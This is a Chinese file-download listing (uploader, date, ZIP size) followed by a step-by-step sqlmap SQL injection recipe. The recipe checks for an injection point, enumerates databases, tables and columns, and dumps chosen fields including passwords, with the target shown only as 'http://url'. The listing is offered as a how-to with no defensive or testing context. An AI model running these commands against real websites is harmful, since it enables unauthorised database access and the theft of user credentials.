上传者: hostlove123
|
上传时间: 2021-08-12 01:34:49
|
文件大小: 10.75MB
|
文件类型: ZIP
注入步骤:
检查注入点
sqlmap -u http://url
列数据库信息
sqlmap -u http://url --dbs
指定库名列出所有表
sqlmap -u http://url -D dbname --tables
指定库名表名列出所有字段
sqlmap -u http://url -D dbname -T tablename --columns
指定库名表名字段dump出指定字段
sqlmap -u http://url -D dbname -T tablename -C ac,id,password --dump